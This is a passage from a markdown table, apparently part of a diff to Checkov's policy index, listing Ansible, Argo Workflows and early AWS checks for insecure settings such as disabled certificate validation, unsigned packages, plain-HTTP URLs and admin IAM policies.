resource | [].tasks[?"uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | +| 53 | CKV_ANSIBLE_1 | resource | [].tasks[].block[?"ansible.builtin.uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | +| 54 | CKV_ANSIBLE_1 | resource | [].tasks[].block[?"uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | +| 55 | CKV_ANSIBLE_1 | resource | [].tasks[].block[].block[?"ansible.builtin.uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | +| 56 | CKV_ANSIBLE_1 | resource | [].tasks[].block[].block[?"uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | +| 57 | CKV_ANSIBLE_1 | resource | [].tasks[].block[].block[].block[?"ansible.builtin.uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | +| 58 | CKV_ANSIBLE_1 | resource | [].tasks[].block[].block[].block[?"uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | +| 59 | 
CKV_ANSIBLE_2 | resource | [?"ansible.builtin.get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | +| 60 | CKV_ANSIBLE_2 | resource | [?"get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | +| 61 | CKV_ANSIBLE_2 | resource | [].block[?"ansible.builtin.get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | +| 62 | CKV_ANSIBLE_2 | resource | [].block[?"get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | +| 63 | CKV_ANSIBLE_2 | resource | [].block[].block[?"ansible.builtin.get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | +| 64 | CKV_ANSIBLE_2 | resource | [].block[].block[?"get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | +| 65 | CKV_ANSIBLE_2 | resource | [].block[].block[].block[?"ansible.builtin.get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | 
[GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | +| 66 | CKV_ANSIBLE_2 | resource | [].block[].block[].block[?"get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | +| 67 | CKV_ANSIBLE_2 | resource | [].tasks[?"ansible.builtin.get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | +| 68 | CKV_ANSIBLE_2 | resource | [].tasks[?"get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | +| 69 | CKV_ANSIBLE_2 | resource | [].tasks[].block[?"ansible.builtin.get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | +| 70 | CKV_ANSIBLE_2 | resource | [].tasks[].block[?"get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | +| 71 | CKV_ANSIBLE_2 | resource | [].tasks[].block[].block[?"ansible.builtin.get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | +| 72 | CKV_ANSIBLE_2 | resource | [].tasks[].block[].block[?"get_url" != null][] | 
Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | +| 73 | CKV_ANSIBLE_2 | resource | [].tasks[].block[].block[].block[?"ansible.builtin.get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | +| 74 | CKV_ANSIBLE_2 | resource | [].tasks[].block[].block[].block[?"get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | +| 75 | CKV_ANSIBLE_3 | resource | [?"ansible.builtin.yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | +| 76 | CKV_ANSIBLE_3 | resource | [?"yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | +| 77 | CKV_ANSIBLE_3 | resource | [].block[?"ansible.builtin.yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | +| 78 | CKV_ANSIBLE_3 | resource | [].block[?"yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | +| 79 | CKV_ANSIBLE_3 | resource | [].block[].block[?"ansible.builtin.yum" != 
null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | +| 80 | CKV_ANSIBLE_3 | resource | [].block[].block[?"yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | +| 81 | CKV_ANSIBLE_3 | resource | [].block[].block[].block[?"ansible.builtin.yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | +| 82 | CKV_ANSIBLE_3 | resource | [].block[].block[].block[?"yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | +| 83 | CKV_ANSIBLE_3 | resource | [].tasks[?"ansible.builtin.yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | +| 84 | CKV_ANSIBLE_3 | resource | [].tasks[?"yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | +| 85 | CKV_ANSIBLE_3 | resource | [].tasks[].block[?"ansible.builtin.yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | +| 86 | CKV_ANSIBLE_3 | resource | [].tasks[].block[?"yum" != null][] | Ensure that certificate 
validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | +| 87 | CKV_ANSIBLE_3 | resource | [].tasks[].block[].block[?"ansible.builtin.yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | +| 88 | CKV_ANSIBLE_3 | resource | [].tasks[].block[].block[?"yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | +| 89 | CKV_ANSIBLE_3 | resource | [].tasks[].block[].block[].block[?"ansible.builtin.yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | +| 90 | CKV_ANSIBLE_3 | resource | [].tasks[].block[].block[].block[?"yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | +| 91 | CKV_ANSIBLE_4 | resource | [?"ansible.builtin.yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | +| 92 | CKV_ANSIBLE_4 | resource | [?"yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | +| 93 | CKV_ANSIBLE_4 | resource | [].block[?"ansible.builtin.yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | 
[YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | +| 94 | CKV_ANSIBLE_4 | resource | [].block[?"yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | +| 95 | CKV_ANSIBLE_4 | resource | [].block[].block[?"ansible.builtin.yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | +| 96 | CKV_ANSIBLE_4 | resource | [].block[].block[?"yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | +| 97 | CKV_ANSIBLE_4 | resource | [].block[].block[].block[?"ansible.builtin.yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | +| 98 | CKV_ANSIBLE_4 | resource | [].block[].block[].block[?"yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | +| 99 | CKV_ANSIBLE_4 | resource | [].tasks[?"ansible.builtin.yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | +| 100 | CKV_ANSIBLE_4 | resource | [].tasks[?"yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | +| 101 | CKV_ANSIBLE_4 | 
resource | [].tasks[].block[?"ansible.builtin.yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | +| 102 | CKV_ANSIBLE_4 | resource | [].tasks[].block[?"yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | +| 103 | CKV_ANSIBLE_4 | resource | [].tasks[].block[].block[?"ansible.builtin.yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | +| 104 | CKV_ANSIBLE_4 | resource | [].tasks[].block[].block[?"yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | +| 105 | CKV_ANSIBLE_4 | resource | [].tasks[].block[].block[].block[?"ansible.builtin.yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | +| 106 | CKV_ANSIBLE_4 | resource | [].tasks[].block[].block[].block[?"yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | +| 107 | CKV_ANSIBLE_5 | resource | [?"ansible.builtin.apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | +| 108 | CKV_ANSIBLE_5 | resource | [?"apt" != null][] | Ensure that 
packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | +| 109 | CKV_ANSIBLE_5 | resource | [].block[?"ansible.builtin.apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | +| 110 | CKV_ANSIBLE_5 | resource | [].block[?"apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | +| 111 | CKV_ANSIBLE_5 | resource | [].block[].block[?"ansible.builtin.apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | +| 112 | CKV_ANSIBLE_5 | resource | [].block[].block[?"apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | +| 113 | CKV_ANSIBLE_5 | resource | [].block[].block[].block[?"ansible.builtin.apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | +| 114 | CKV_ANSIBLE_5 | resource | [].block[].block[].block[?"apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | 
[AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | +| 115 | CKV_ANSIBLE_5 | resource | [].tasks[?"ansible.builtin.apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | +| 116 | CKV_ANSIBLE_5 | resource | [].tasks[?"apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | +| 117 | CKV_ANSIBLE_5 | resource | [].tasks[].block[?"ansible.builtin.apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | +| 118 | CKV_ANSIBLE_5 | resource | [].tasks[].block[?"apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | +| 119 | CKV_ANSIBLE_5 | resource | [].tasks[].block[].block[?"ansible.builtin.apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | +| 120 | CKV_ANSIBLE_5 | resource | [].tasks[].block[].block[?"apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | 
+| 121 | CKV_ANSIBLE_5 | resource | [].tasks[].block[].block[].block[?"ansible.builtin.apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | +| 122 | CKV_ANSIBLE_5 | resource | [].tasks[].block[].block[].block[?"apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | +| 123 | CKV_ANSIBLE_6 | resource | [?"ansible.builtin.apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | +| 124 | CKV_ANSIBLE_6 | resource | [?"apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | +| 125 | CKV_ANSIBLE_6 | resource | [].block[?"ansible.builtin.apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | +| 126 | CKV_ANSIBLE_6 | resource | [].block[?"apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a 
broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | +| 127 | CKV_ANSIBLE_6 | resource | [].block[].block[?"ansible.builtin.apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | +| 128 | CKV_ANSIBLE_6 | resource | [].block[].block[?"apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | +| 129 | CKV_ANSIBLE_6 | resource | [].block[].block[].block[?"ansible.builtin.apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | +| 130 | CKV_ANSIBLE_6 | resource | [].block[].block[].block[?"apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | +| 131 | CKV_ANSIBLE_6 | resource | [].tasks[?"ansible.builtin.apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | 
[AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | +| 132 | CKV_ANSIBLE_6 | resource | [].tasks[?"apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | +| 133 | CKV_ANSIBLE_6 | resource | [].tasks[].block[?"ansible.builtin.apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | +| 134 | CKV_ANSIBLE_6 | resource | [].tasks[].block[?"apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | +| 135 | CKV_ANSIBLE_6 | resource | [].tasks[].block[].block[?"ansible.builtin.apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | +| 136 | CKV_ANSIBLE_6 | resource | [].tasks[].block[].block[?"apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | 
[AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | +| 137 | CKV_ANSIBLE_6 | resource | [].tasks[].block[].block[].block[?"ansible.builtin.apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | +| 138 | CKV_ANSIBLE_6 | resource | [].tasks[].block[].block[].block[?"apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | +| 139 | CKV2_ANSIBLE_1 | resource | tasks.ansible.builtin.uri | Ensure that HTTPS url is used with uri | Ansible | [UriHttpsOnly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/UriHttpsOnly.yaml) | +| 140 | CKV2_ANSIBLE_1 | resource | tasks.uri | Ensure that HTTPS url is used with uri | Ansible | [UriHttpsOnly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/UriHttpsOnly.yaml) | +| 141 | CKV2_ANSIBLE_2 | resource | tasks.ansible.builtin.get_url | Ensure that HTTPS url is used with get_url | Ansible | [GetUrlHttpsOnly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/GetUrlHttpsOnly.yaml) | +| 142 | CKV2_ANSIBLE_2 | resource | tasks.get_url | Ensure that HTTPS url is used with get_url | Ansible | [GetUrlHttpsOnly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/GetUrlHttpsOnly.yaml) | +| 143 | CKV2_ANSIBLE_3 | resource | block | Ensure block is handling task errors properly | Ansible | 
[BlockErrorHandling.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/BlockErrorHandling.yaml) | +| 144 | CKV2_ANSIBLE_4 | resource | tasks.ansible.builtin.dnf | Ensure that packages with untrusted or missing GPG signatures are not used by dnf | Ansible | [DnfDisableGpgCheck.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/DnfDisableGpgCheck.yaml) | +| 145 | CKV2_ANSIBLE_4 | resource | tasks.dnf | Ensure that packages with untrusted or missing GPG signatures are not used by dnf | Ansible | [DnfDisableGpgCheck.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/DnfDisableGpgCheck.yaml) | +| 146 | CKV2_ANSIBLE_5 | resource | tasks.ansible.builtin.dnf | Ensure that SSL validation isn't disabled with dnf | Ansible | [DnfSslVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/DnfSslVerify.yaml) | +| 147 | CKV2_ANSIBLE_5 | resource | tasks.dnf | Ensure that SSL validation isn't disabled with dnf | Ansible | [DnfSslVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/DnfSslVerify.yaml) | +| 148 | CKV2_ANSIBLE_6 | resource | tasks.ansible.builtin.dnf | Ensure that certificate validation isn't disabled with dnf | Ansible | [DnfValidateCerts.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/DnfValidateCerts.yaml) | +| 149 | CKV2_ANSIBLE_6 | resource | tasks.dnf | Ensure that certificate validation isn't disabled with dnf | Ansible | [DnfValidateCerts.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/DnfValidateCerts.yaml) | +| 150 | CKV_ARGO_1 | argo_workflows | spec | Ensure Workflow pods are not using the default ServiceAccount | Argo Workflows | 
[DefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/argo_workflows/checks/template/DefaultServiceAccount.py) | +| 151 | CKV_ARGO_2 | argo_workflows | spec | Ensure Workflow pods are running as non-root user | Argo Workflows | [RunAsNonRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/argo_workflows/checks/template/RunAsNonRoot.py) | +| 152 | CKV_AWS_1 | data | aws_iam_policy_document | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [AdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/AdminPolicyDocument.py) | +| 153 | CKV_AWS_1 | resource | serverless_aws | Ensure IAM policies that allow full "*-*" administrative privileges are not created | serverless | [AdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/serverless/checks/function/aws/AdminPolicyDocument.py) | +| 154 | CKV_AWS_2 | resource | AWS::ElasticLoadBalancingV2::Listener | Ensure ALB protocol is HTTPS | Cloudformation | [ALBListenerHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ALBListenerHTTPS.py) | +| 155 | CKV_AWS_2 | resource | aws_alb_listener | Ensure ALB protocol is HTTPS | Terraform | [ALBListenerHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBListenerHTTPS.py) | +| 156 | CKV_AWS_2 | resource | aws_lb_listener | Ensure ALB protocol is HTTPS | Terraform | [ALBListenerHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBListenerHTTPS.py) | +| 157 | CKV_AWS_3 | resource | AWS::EC2::Volume | Ensure all data stored in the EBS is securely encrypted | Cloudformation | [EBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EBSEncryption.py) | +| 158 | CKV_AWS_3 | resource | aws_ebs_volume | Ensure all data 
